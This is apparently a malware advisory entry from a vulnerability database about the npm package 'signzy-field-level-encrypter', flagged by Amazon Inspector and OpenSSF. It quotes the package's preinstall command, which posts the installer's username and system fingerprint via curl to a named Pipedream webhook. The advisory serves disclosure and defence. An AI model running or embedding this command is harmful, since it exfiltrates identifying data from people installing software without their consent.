VDB
KO

MAL-2026-10972

Malicious code in signzy-field-level-encrypter (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (38314f87203a0860a07c13fed06e2ec374545060b18be84a2d125556b93bc451) package.json declares a preinstall lifecycle script that runs `echo "$(whoami): $(uname -a)" | curl -X POST` against a hardcoded Pipedream webhook at https://eob8pyiw2d4hxvk.m.pipedream.net. On `npm install`, the installer's OS username and kernel/architecture/hostname fingerprint are captured and transmitted to an author-controlled endpoint without consent or opt-out. The destination is a generic Pipedream request-bin, not infrastructure related to any legitimate field-level-encryption purpose the package name implies.

## Source: ossf-package-analysis (1620206c32062d89cd35aa65951fb139a004cf78c5d1b0b6eae1e7fb7378238e) The OpenSSF Package Analysis project identified 'signzy-field-level-encrypter' @ 12.9.13 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.

- The package executes one or more commands associated with malicious behavior.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / signzy-field-level-encrypter

No fixed version published yet for signzy-field-level-encrypter (npm). Pin to a known-safe version or switch to an alternative.

References